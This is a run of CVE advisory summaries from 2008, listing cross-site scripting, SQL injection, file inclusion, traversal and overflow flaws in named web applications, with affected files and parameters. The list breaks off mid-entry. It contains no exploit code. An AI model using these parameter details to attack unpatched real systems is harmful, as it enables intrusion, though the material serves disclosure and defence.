[CVE-2008-0700] Cross-site scripting (XSS) vulnerability in search.php in Crux Software CruxCMS 3.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown [CVE-2008-0694] Cross-site scripting (XSS) vulnerability in the HTTP Server in IBM OS/400 V5R3M0 and V5R4M0 allows remote attackers to inject arbitrary web script or HTML via the Expect HTTP header. [CVE-2008-0691] Multiple cross-site scripting (XSS) vulnerabilities in admin_panel.php in the Simon Elvery WP-Footnotes 2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) wp_footnotes_current_settings[priority], (2) wp_footnotes_current_settings[style_rules], (3) wp_footnotes_current_settings[pre_footnotes], and (4) wp_footnotes_current_settings[post_footnotes] parameters. [CVE-2008-0688] Cross-site scripting (XSS) vulnerability in catalog.php in Smartscript Domain Trader 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter in a viewcategory action. [CVE-2008-0687] Cross-site scripting (XSS) vulnerability in siteadmin/editor_files/includes/load_message.php in the Youtube Clone Script allows remote attackers to inject arbitrary web script or HTML via the lang[please_wait] parameter. [CVE-2008-0684] Cross-site scripting (XSS) vulnerability in ViewCat.php in iTechClassifieds 3.0 allows remote attackers to inject arbitrary web script or HTML via the CatID parameter. [CVE-2008-0679] Cross-site scripting (XSS) vulnerability in index.php in BlogPHP 2.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2008-0676] Cross-site scripting (XSS) vulnerability in search.php in A-Blog 2 allows remote attackers to inject arbitrary web script or HTML via the words parameter. [CVE-2008-0669] Cross-site scripting (XSS) vulnerability in search.cgi in Sift Unity allows remote attackers to inject arbitrary web script or HTML via the qt parameter. NOTE: the provenance of this information is unknown [CVE-2008-0666] Website META Language (WML) 2.0.11 allows local users to overwrite arbitrary files via a symlink attack on (1) the /tmp/pe.tmp.$$ temporary file used by wml_contrib/wmg.cgi and (2) temporary files used by wml_backend/p3_eperl/eperl_sys.c. [CVE-2008-0665] wml_backend/p1_ipp/ipp.src in Website META Language (WML) 2.0.11 allows local users to overwrite arbitrary files via a symlink attack on the ipp.$$.tmp temporary file. [CVE-2008-0656] Unrestricted file upload vulnerability in dmclTrace.jsp in EMC Documentum Administrator 5.3.0.313 and Webtop 5.3.0.317 allows remote attackers to overwrite arbitrary files via the filename attribute. [CVE-2008-0645] Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) config/conf-activation.php, (2) menu/item.php, and (3) modules/conf_modules.php in admin/system/ [CVE-2008-0643] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion MX 7 and ColdFusion 8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0642] Cross-site scripting (XSS) vulnerability in files created by Adobe RoboHelp 6 and 7, possibly involving use of a (1) WebHelp5 (WebHelp5Ext) or (2) WildFire (WildFireExt) extension, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-1280. [CVE-2008-0622] Cross-site scripting (XSS) vulnerability in RaidenHTTPD 2.0.19 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the ulang parameter. [CVE-2008-0618] Multiple cross-site scripting (XSS) vulnerabilities in the DMSGuestbook 1.8.0 and 1.7.0 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) gbname, (2) gbemail, (3) gburl, and (4) gbmsg parameters to unspecified programs. NOTE: the provenance of this information is unknown [CVE-2008-0617] Multiple cross-site scripting (XSS) vulnerabilities in the DMSGuestbook 1.7.0 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) file parameter to wp-admin/admin.php, or the (2) messagefield parameter in the guestbook page, and the (3) title parameter in the messagearea. [CVE-2008-0613] Open redirect vulnerability in htdocs/user.php in XOOPS 2.0.18 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the xoops_redirect parameter. [CVE-2008-0609] Directory traversal vulnerability in index.php in DivideConcept VHD Web Pack 2.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter. [CVE-2008-0605] Multiple cross-site scripting (XSS) vulnerabilities in AstroSoft HelpDesk before 1.95.228 allow remote attackers to inject arbitrary web script or HTML via the (1) txtSearch parameter to operator/article/article_search_results.asp and the (2) Attach_Id parameter to operator/article/article_attachment.asp. NOTE: for vector 2, the XSS occurs in a forced SQL error message. [CVE-2008-0595] dbus-daemon in D-Bus before 1.0.3, and 1.1.x before 1.1.20, recognizes send_interface attributes in allow directives in the security policy only for fully qualified method calls, which allows local users to bypass intended access restrictions via a method call with a NULL interface. [CVE-2008-0594] Mozilla Firefox before 2.0.0.12 does not always display a web forgery warning dialog if the entire contents of a web page are in a DIV tag that uses absolute positioning, which makes it easier for remote attackers to conduct phishing attacks. [CVE-2008-0585] sysmgt.websm.webaccess in IBM AIX 5.2 and 5.3 has world writable permissions for unspecified WebSM Remote Client files, which allows local users to "alter the behavior of" this client by overwriting these files. [CVE-2008-0583] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Description and unspecified other metadata fields of a Metacafe movie submitted by Metacafe Pro to the Skype video gallery, accessible through a search within the (1) "Add video to chat" or (2) "Add video to mood" dialog, a different vector than CVE-2008-0454. [CVE-2008-0582] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler. [CVE-2008-0578] Cross-site scripting (XSS) vulnerability in the web management login page in Tripwire Enterprise 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0576] Cross-site scripting (XSS) vulnerability in the Project Issue Tracking module 5.x-2.x-dev before 20080130 in the 5.x-2.x series, 5.x-1.2 and earlier in the 5.x-1.x series, 4.7.x-2.6 and earlier in the 4.7.x-2.x series, and 4.7.x-1.6 and earlier in the 4.7.x-1.x series for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors that write to summary table pages. [CVE-2008-0575] Cross-site request forgery (CSRF) vulnerability in admin/admincenter.php in webSPELL 4.01.02 allows remote attackers to assign the superadmin privilege level to arbitrary accounts as administrators via an "update member" action. [CVE-2008-0574] Cross-site scripting (XSS) vulnerability in index.php in webSPELL 4.01.02 allows remote attackers to inject arbitrary web script or HTML via the sort parameter in a whoisonline action. [CVE-2008-0572] Multiple PHP remote file inclusion vulnerabilities in Mindmeld 1.2.0.10 allow remote attackers to execute arbitrary PHP code via a URL in the MM_GLOBALS[home] parameter to (1) acweb/admin_index.php [CVE-2008-0558] Cross-site scripting (XSS) vulnerability in Uniwin eCart Professional before 2.0.16 allows remote attackers to inject arbitrary web script or HTML via the rp parameter to cartView.asp and unspecified other components. NOTE: the provenance of this information is unknown [CVE-2008-0552] Cross-site scripting (XSS) vulnerability in index.php in eTicket 1.5.6-RC4 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2008-0551] The NamoInstaller.NamoInstall.1 ActiveX control in NamoInstaller.dll 3.0.0.1 and earlier in Namo Web Editor in Sejoong Namo ActiveSquare 6 allows remote attackers to execute arbitrary code via a URL in the argument to the Install method. NOTE: some of these details are obtained from third party information. [CVE-2008-0547] Cross-site scripting (XSS) vulnerability in admin/utilities_ConfigHelp.asp in CandyPress (CP) 4.1.1.26, and probably earlier 4.x and 3.x versions, allows remote attackers to inject arbitrary web script or HTML via the helpfield parameter. [CVE-2008-0541] Multiple cross-site scripting (XSS) vulnerabilities in forum.php in Gerd Tentler Simple Forum 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) open and (2) date_show parameters. [CVE-2008-0540] Multiple cross-site scripting (XSS) vulnerabilities in trixbox 2.4.2.0 allow remote attackers to inject arbitrary web script or HTML via the query string to index.php in (1) user/ or (2) maint/. [CVE-2008-0539] Cross-site scripting (XSS) vulnerability in dms/policy/rep_request.php in F5 BIG-IP Application Security Manager (ASM) 9.4.3 allows remote attackers to inject arbitrary web script or HTML via the report_type parameter. [CVE-2008-0536] Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) 3.0.x before 3.0.7 and 3.1.x before 3.1.0, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (management interface outage) via SSH traffic that occurs during management operations and triggers "illegal I/O operations," aka Bug ID CSCsh49563. [CVE-2008-0533] Multiple cross-site scripting (XSS) vulnerabilities in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to inject arbitrary web script or HTML via an argument located immediately after the Help argument, and possibly unspecified other vectors. [CVE-2008-0524] Cross-site request forgery (CSRF) vulnerability in the management interface in multiple Yamaha RT series routers allows remote attackers to change password settings and probably other configuration settings as administrators via unspecified vectors. [CVE-2008-0523] Multiple cross-site scripting (XSS) vulnerabilities in SoftCart.exe in SoftCart 5.1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) License_Plate, (2) License_State, (3) Ticket_Date, and (4) Ticket_Number parameters. NOTE: the provenance of this information is unknown [CVE-2008-0522] Cross-site scripting (XSS) vulnerability in multiple Hal Networks shopping-cart products allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0505] Multiple cross-site scripting (XSS) vulnerabilities in docs/showdoc.php in Coppermine Photo Gallery (CPG) before 1.4.15 allow remote attackers to inject arbitrary web script or HTML via the (1) h and (2) t parameters. [CVE-2008-0497] Cross-site scripting (XSS) vulnerability in action.php in Nucleus CMS 3.31 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO, which is not quoted when processing PHP_SELF. [CVE-2008-0496] Cross-site scripting (XSS) vulnerability in index.php in AmpJuke 0.7.0 allows remote attackers to inject arbitrary web script or HTML via the limit parameter in a search action. [CVE-2008-0494] Cross-site scripting (XSS) vulnerability in vpnum/userslist.php in Endian Firewall 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the psearch parameter. NOTE: the provenance of this information is unknown [CVE-2008-0481] Directory traversal vulnerability in RTE_file_browser.asp in Web Wiz Rich Text Editor 4.0 allows remote attackers to list arbitrary directories, and .txt and .zip files, via a .....\\\ in the sub parameter in a save action. [CVE-2008-0480] Multiple directory traversal vulnerabilities in Web Wiz Forums 9.07 and earlier allow remote attackers to list arbitrary directories, and .txt and .zip files, via a .....\\\ in the sub parameter to (1) RTE_file_browser.asp or (2) file_browser.asp. [CVE-2008-0479] Directory traversal vulnerability in RTE_file_browser.asp in Web Wiz NewsPad 1.02 allows remote attackers to list arbitrary directories, and .txt and .zip files, via a .....\\\ in the sub parameter. [CVE-2008-0474] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Applications Manager 8.1 build 8100 allow remote attackers to inject arbitrary web script or HTML via the (1) showlink parameter to jsp/DiscoveryProfiles.jsp [CVE-2008-0473] RTE_popup_save_file.asp in Web Wiz Rich Text Editor 4.0 allows remote attackers to upload (1) .html and (2) .htm files via unspecified vectors. [CVE-2008-0466] Web Wiz RTE_file_browser.asp in, as used in Web Wiz Rich Text Editor 4.0, Web Wiz Forums 9.07, and Web Wiz Newspad 1.02, does not require authentication, which allows remote attackers to list directories and read files. NOTE: this can be leveraged for listings outside the configured directory tree by exploiting a separate directory traversal vulnerability. [CVE-2008-0463] Cross-site scripting (XSS) vulnerability in the Workflow 4.7.x before 4.7.x-1.2 and 5.x before 5.x-1.2 module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving node properties. [CVE-2008-0462] Cross-site scripting (XSS) vulnerability in the Archive 5.x before 5.x-1.8 module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file. [CVE-2008-0454] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Title field of a (1) Dailymotion and possibly (2) Metacafe movie in the Skype video gallery, accessible through a search within the "Add video to chat" dialog, aka "videomood XSS." [CVE-2008-0447] SQL injection vulnerability in index.php in Foojan WMS PHP Weblog 1.0 allows remote attackers to execute arbitrary SQL commands via the story parameter. [CVE-2008-0444] Cross-site scripting (XSS) vulnerability in Electronic Logbook (ELOG) before 2.7.0 allows remote attackers to inject arbitrary web script or HTML via subtext parameter to unspecified components. [CVE-2008-0442] PHP remote file inclusion vulnerability in inc/linkbar.php in Small Axe Weblog 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the ffile parameter, a different vector than CVE-2008-0376. NOTE: the provenance of this information is unknown [CVE-2008-0439] Cross-site scripting (XSS) vulnerability in templates/default/admincp/attachments_header.php in DeluxeBB 1.1 allows remote attackers to inject arbitrary web script or HTML via the lang_listofmatches parameter. [CVE-2008-0438] Cross-site scripting (XSS) vulnerability in the font rendering functionality in Novemberborn sIFR 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the txt parameter to a Flash (SWF) file, as demonstrated by fonts/FuturaLt.swf. [CVE-2008-0437] Multiple buffer overflows in the WebHPVCInstall.HPVirtualRooms14 ActiveX control in HPVirtualRooms14.dll 1.0.0.100, as used in the installation process for HP Virtual Rooms, allow remote attackers to execute arbitrary code via a long (1) AuthenticationURL, (2) PortalAPIURL, or (3) cabroot property value. NOTE: some of these details are obtained from third party information. [CVE-2008-0436] Cross-site scripting (XSS) vulnerability in profile-upload/upload.asp in PD9 Software MegaBBS 1.5.14b allows remote attackers to inject arbitrary web script or HTML via the target parameter. [CVE-2008-0432] Cross-site scripting (XSS) vulnerability in index.php in phpAutoVideo 2.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2008-0430] SQL injection vulnerability in form.php in 360 Web Manager 3.0 allows remote attackers to execute arbitrary SQL commands via the IDFM parameter. [CVE-2008-0426] Multiple cross-site scripting (XSS) vulnerabilities in submit.php in PacerCMS before 0.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) headline, or (3) text field in a message. [CVE-2008-0417] CRLF injection vulnerability in Mozilla Firefox before 2.0.0.12 allows remote user-assisted web sites to corrupt the user's password store via newlines that are not properly handled when the user saves a password. [CVE-2008-0416] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox before 2.0.0.12, Thunderbird before 2.0.0.12, and SeaMonkey before 1.1.8 allow remote attackers to inject arbitrary web script or HTML via certain character encodings, including (1) a backspace character that is treated as whitespace, (2) 0x80 with Shift_JIS encoding, and (3) "zero-length non-ASCII sequences" in certain Asian character sets. [CVE-2008-0409] Cross-site scripting (XSS) vulnerability in HTTP File Server (HFS) before 2.2c allows remote attackers to inject arbitrary web script or HTML via the userinfo subcomponent of a URL. [CVE-2008-0404] Cross-site scripting (XSS) vulnerability in Mantis before 1.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to the "Most active bugs" summary. [CVE-2008-0403] The web server in Belkin Wireless G Plus MIMO Router F5D9230-4 does not require authentication for SaveCfgFile.cgi, which allows remote attackers to read and modify configuration via a direct request to SaveCfgFile.cgi. [CVE-2008-0402] Unspecified vulnerability in IBM WebSphere Business Modeler Basic and Advanced 6.0.2.1 before Interim Fix 11 allows remote authenticated users to bypass intended access restrictions and delete unspecified repository resources via unknown vectors, even when they are not administrators or members of the repository's owning group. [CVE-2008-0400] Cross-site scripting (XSS) vulnerability in header.tpl.php in the modern template for Singapore 0.10.1 allows remote attackers to inject arbitrary web script or HTML via the gallery parameter to default.php. [CVE-2008-0398] Cross-site scripting (XSS) vulnerability in aflog 1.01, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the comment form. [CVE-2008-0389] Unspecified vulnerability in the serveServletsByClassnameEnabled feature in IBM WebSphere Application Server (WAS) 6.0 through 6.0.2.25, 6.1 through 6.1.0.14, and 5.1.1.x before 5.1.1.18 has unknown impact and attack vectors. [CVE-2008-0384] OpenBSD 4.2 allows local users to cause a denial of service (kernel panic) by calling the SIOCGIFRTLABEL IOCTL on an interface that does not have a route label, which triggers a NULL pointer dereference when the return value from the rtlabel_id2name function is not checked. [CVE-2008-0376] PHP remote file inclusion vulnerability in inc/linkbar.php in Small Axe Weblog 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the cfile parameter. [CVE-2008-0375] Unspecified vulnerability in OKI C5510MFP Printer CU H2.15, PU 01.03.01, System F/W 1.01, and Web Page 1.00 allows remote attackers to set the password and obtain administrative access via unspecified vectors. [CVE-2008-0374] OKI C5510MFP Printer CU H2.15, PU 01.03.01, System F/W 1.01, and Web Page 1.00 sends the configuration of the printer in cleartext, which allows remote attackers to obtain the administrative password by connecting to TCP port 5548 or 7777. [CVE-2008-0370] Cross-site scripting (XSS) vulnerability in dohtaccess.html in cPanel before 11.17 build 19417 allows remote attackers to inject arbitrary web script or HTML via the rurl parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-0362] Cross-site scripting (XSS) vulnerability in gallery.php in Clever Copy 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the album parameter. [CVE-2008-0359] Multiple cross-site scripting (XSS) vulnerabilities in BLOG:CMS 4.2.1b allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin.php or (2) index.php in photo/. [CVE-2008-0354] Cross-site scripting (XSS) vulnerability in the chat client in IBM Lotus Sametime 7.5 and 7.5.1 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted message, which triggers code execution after a mouseover event initiated by the victim. [CVE-2008-0350] admin/index.php in Evilsentinel 1.0.9 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to gain administrative privileges and make arbitrary configuration changes. [CVE-2008-0338] Directory traversal vulnerability in the mwGetLocalFileName function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to read arbitrary files and list arbitrary directories via a (1) .%2e (partially encoded dot dot) or (2) %2e%2e (encoded dot dot) in the URI. [CVE-2008-0337] Heap-based buffer overflow in the _mwProcessReadSocket function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to execute arbitrary code via a long URI. [CVE-2008-0335] Cross-site scripting (XSS) vulnerability in BugTracker.NET before 2.7.2 allows remote attackers to inject arbitrary web script or HTML via an arbitrary custom text field. [CVE-2008-0334] Cross-site scripting (XSS) vulnerability in pm/language/spanish/preferences.php in PMachine Pro 2.4.1 allows remote attackers to inject arbitrary web script or HTML via the L_PREF_NAME[855] parameter. [CVE-2008-0333] Directory traversal vulnerability in download_view_attachment.aspx in AfterLogic MailBee WebMail Pro 4.1 for ASP.NET allows remote attackers to read arbitrary files via a .. (dot dot) in the temp_filename parameter. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. [CVE-2008-0313] The ActiveDataInfo.LaunchProcess method in the SymAData.ActiveDataInfo.1 ActiveX control 2.7.0.1 in SYMADATA.DLL in multiple Symantec Norton products including Norton 360 1.0, AntiVirus 2006 through 2008, Internet Security 2006 through 2008, and System Works 2006 through 2008, does not properly determine the location of the AutoFix Tool, which allows remote attackers to execute arbitrary code via a remote (1) WebDAV or (2) SMB share. [CVE-2008-0311] Stack-based buffer overflow in the PGMWebHandler::parse_request function in the StarTeam Multicast Service component (STMulticastService) 6.4 in Borland CaliberRM 2006 allows remote attackers to execute arbitrary code via a large HTTP request. [CVE-2008-0298] KHTML WebKit as used in Apple Safari 2.x allows remote attackers to cause a denial of service (browser crash) via a crafted web page, possibly involving a STYLE attribute of a DIV element. [CVE-2008-0292] Cross-site scripting (XSS) vulnerability in photo_album.pl in Dansie Photo Album 1.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown [CVE-2008-0284] Cross-site scripting (XSS) vulnerability in Simple Machines Forum (SMF) 1.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) Itemid or (2) topic arguments. [CVE-2008-0276] Cross-site scripting (XSS) vulnerability in the Devel module before 5.x-0.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via a site variable, related to lack of escaping of the variable table. [CVE-2008-0274] Cross-site scripting (XSS) vulnerability in Drupal 4.7.x and 5.x, when certain .htaccess protections are disabled, allows remote attackers to inject arbitrary web script or HTML via crafted links involving theme .tpl.php files. [CVE-2008-0271] The editor deletion form in BUEditor 4.7.x before 4.7.x-1.0 and 5.x before 5.x-1.1, a module for Drupal, does not follow Drupal's Forms API submission model, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and delete custom editor interfaces. [CVE-2008-0268] Cross-site scripting (XSS) vulnerability in view.php in eTicket 1.5.5.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2008-0258] Cross-site scripting (XSS) vulnerability in index.php in PHP Running Management (phpRunMan) before 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2008-0257] Cross-site scripting (XSS) vulnerability in search.pl in Dansie Search Engine 2.7 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. NOTE: the provenance of this information is unknown [CVE-2008-0249] PHP Webquest 2.6 allows remote attackers to retrieve database credentials via a direct request to admin/backup_phpwebquest.php, which leaks the credentials in an error message if a call to /usr/bin/mysqldump fails. NOTE: this might only be an issue in limited environments. [CVE-2008-0241] Open redirect vulnerability in /idm/user/login.jsp in Sun Java System Identity Manager 6.0 SP1 through SP3, 7.0, and 7.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the nextPage parameter. [CVE-2008-0240] /idm/help/index.jsp in Sun Java System Identity Manager 6.0 SP1 through SP3, 7.0, and 7.1 allows remote attackers to inject frames from arbitrary web sites and conduct phishing attacks via the helpUrl parameter, aka "frame injection." [CVE-2008-0239] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager 6.0 SP1 through SP3, 7.0, and 7.1 allow remote attackers to inject arbitrary HTML or web script via the (1) cntry or lang parameters to /idm/login.jsp, (2) resultsForm parameter to /idm/account/findForSelect.jsp, or (3) activeControl parameter to /idm/user/main.jsp. [CVE-2008-0231] Multiple directory traversal vulnerabilities in index.php in Tuned Studios (1) Subwoofer, (2) Freeze Theme, (3) Orange Cutout, (4) Lonely Maple, (5) Endless, (6) Classic Theme, and (7) Music Theme webpage templates allow remote attackers to include and execute arbitrary files via ".." sequences in the page parameter. NOTE: this can be leveraged for remote file inclusion when running in some PHP 5 environments. [CVE-2008-0221] Directory traversal vulnerability in the WebLaunch.WeblaunchCtl.1 (aka CWebLaunchCtl) ActiveX control in weblaunch.ocx 1.0.0.1 in Gateway Weblaunch allows remote attackers to execute arbitrary programs via a ..\ (dot dot backslash) in the second argument to the DoWebLaunch method. NOTE: some of these details are obtained from third party information. [CVE-2008-0220] Multiple stack-based buffer overflows in the WebLaunch.WeblaunchCtl.1 (aka CWebLaunchCtl) ActiveX control in weblaunch.ocx 1.0.0.1 in Gateway Weblaunch allow remote attackers to execute arbitrary code via a long string in the (1) second or (2) fourth argument to the DoWebLaunch method. NOTE: some of these details are obtained from third party information. [CVE-2008-0219] SQL injection vulnerability in soporte_horizontal_w.php in PHP Webquest 2.6 allows remote attackers to execute arbitrary SQL commands via the id_actividad parameter, a different vector than CVE-2007-4920. [CVE-2008-0218] Cross-site scripting (XSS) vulnerability in admin/index.html in Merak IceWarp Mail Server allows remote attackers to inject arbitrary web script or HTML via the message parameter. NOTE: the provenance of this information is unknown [CVE-2008-0210] Uebimiau Webmail 2.7.10 and 2.7.2 does not protect authentication state variables from being set through HTTP requests, which allows remote attackers to bypass authentication via a sess[auth]=1 parameter settting. NOTE: this can be leveraged to conduct directory traversal attacks without authentication by using CVE-2008-0140. [CVE-2008-0209] Open redirect vulnerability in Forums/login.asp in Snitz Forums 2000 3.4.06 and earlier allows remote attackers to redirect users to arbitrary web sites via a URL in the target parameter. [CVE-2008-0208] Cross-site scripting (XSS) vulnerability in login.asp in Snitz Forums 2000 3.4.05 and earlier allows remote attackers to inject arbitrary web script or HTML via the target parameter. [CVE-2008-0207] Multiple cross-site scripting (XSS) vulnerabilities in PRO-Search 0.17 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) prot, (2) host, (3) path, (4) name, (5) ext, (6) size, (7) search_days, or (8) show_page parameter to the default URI. [CVE-2008-0206] Multiple cross-site scripting (XSS) vulnerabilities in captcha\captcha.php in the Captcha! 2.5d and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) captcha_ttffolder, (2) captcha_numchars, (3) captcha_ttfrange, or (4) captcha_secret parameter. [CVE-2008-0204] Multiple cross-site scripting (XSS) vulnerabilities in math-comment-spam-protection.php in the Math Comment Spam Protection 2.1 and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) mcsp_opt_msg_no_answer or (2) mcsp_opt_msg_wrong_answer parameter to wp-admin/options-general.php. [CVE-2008-0203] Multiple cross-site scripting (XSS) vulnerabilities in cryptographp/admin.php in the Cryptographp 1.2 and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) cryptwidth, (2) cryptheight, (3) bgimg, (4) charR, (5) charG, (6) charB, (7) charclear, (8) tfont, (9) charel, (10) charelc, (11) charelv, (12) charnbmin, (13) charnbmax, (14) charspace, (15) charsizemin, (16) charsizemax, (17) charanglemax, (18) noisepxmin, (19) noisepxmax, (20) noiselinemin, (21) noiselinemax, (22) nbcirclemin, (23) nbcirclemax, or (24) brushsize parameter to wp-admin/options-general.php. [CVE-2008-0201] Cross-site scripting (XSS) vulnerability in index.php in ExpressionEngine 1.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL parameter. [CVE-2008-0200] Multiple cross-site scripting (XSS) vulnerabilities in account/index.html in RotaBanner Local 3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) drop parameter. [CVE-2008-0197] Multiple cross-site scripting (XSS) vulnerabilities in wp-contact-form/options-contactform.php in the WP-ContactForm 1.5 alpha and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) wpcf_email, (2) wpcf_subject, (3) wpcf_question, (4) wpcf_answer, (5) wpcf_success_msg, (6) wpcf_error_msg, or (7) wpcf_msg parameter to wp-admin/admin.php, or (8) the SRC attribute of an IFRAME element. [CVE-2008-0193] Cross-site scripting (XSS) vulnerability in wp-db-backup.php in WordPress 2.0.11 and earlier, and possibly 2.1.x through 2.3.x, allows remote attackers to inject arbitrary web script or HTML via the backup parameter in a wp-db-backup.php action to wp-admin/edit.php. [CVE-2008-0192] Multiple cross-site scripting (XSS) vulnerabilities in WordPress 2.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the popuptitle parameter to (1) wp-admin/post.php or (2) wp-admin/page-new.php. [CVE-2008-0190] Multiple cross-site scripting (XSS) vulnerabilities in templates/example_template.php in AwesomeTemplateEngine allow remote attackers to inject arbitrary web script or HTML via the (1) data[title], (2) data[message], (3) data[table][1][item], (4) data[table][1][url], or (5) data[poweredby] parameter. [CVE-2008-0187] SQL injection vulnerability in songinfo.php in SAM Broadcaster samPHPweb, possibly 4.2.2 and earlier, allows remote attackers to execute arbitrary SQL commands via the songid parameter. [CVE-2008-0186] Cross-site scripting (XSS) vulnerability in index.php in NetRisk 1.9.7 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter, possibly related to CVE-2008-0144. [CVE-2008-0181] Cross-site scripting (XSS) vulnerability in the Admin portlet in Liferay Portal 4.3.6 allows remote authenticated users to inject arbitrary web script or HTML via the Shutdown message. [CVE-2008-0180] Cross-site scripting (XSS) vulnerability in themes/_unstyled/templates/init.vm in Liferay Portal 4.3.6 allows remote authenticated users to inject arbitrary web script or HTML via the Greeting field in a User Profile. [CVE-2008-0179] Cross-site scripting (XSS) vulnerability in service/impl/UserLocalServiceImpl.java in Liferay Portal 4.3.6 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header, which is used when composing Forgot Password e-mail messages in HTML format. [CVE-2008-0178] Cross-site scripting (XSS) vulnerability in the Enterprise Admin Session Monitoring component in Liferay Portal 4.3.6 allows remote authenticated users to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2008-0155] Cross-site scripting (XSS) vulnerability in index.php in EvilBoard 0.1a (Alpha) allows remote attackers to inject arbitrary web script or HTML via the c parameter. [CVE-2008-0150] Unspecified vulnerability in the LDAP authentication feature in Aruba Mobility Controller 2.3.6.15, 2.5.2.11, 2.5.4.25, 2.5.5.7, 3.1.1.3, and 2.4.8.11-FIPS or earlier allows remote attackers to bypass authentication mechanisms and obtain management or VPN interface access. [CVE-2008-0146] Cross-site scripting (XSS) vulnerability in the error page in W3-mSQL allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the top-level URI. [CVE-2008-0143] PHP remote file inclusion vulnerability in common/db.php in samPHPweb, possibly 4.2.2 and others, as provided with SAM Broadcaster, allows remote attackers to execute arbitrary PHP code via a URL in the commonpath parameter. [CVE-2008-0142] Multiple SQL injection vulnerabilities in WebPortal CMS 0.6-beta allow remote attackers to execute arbitrary 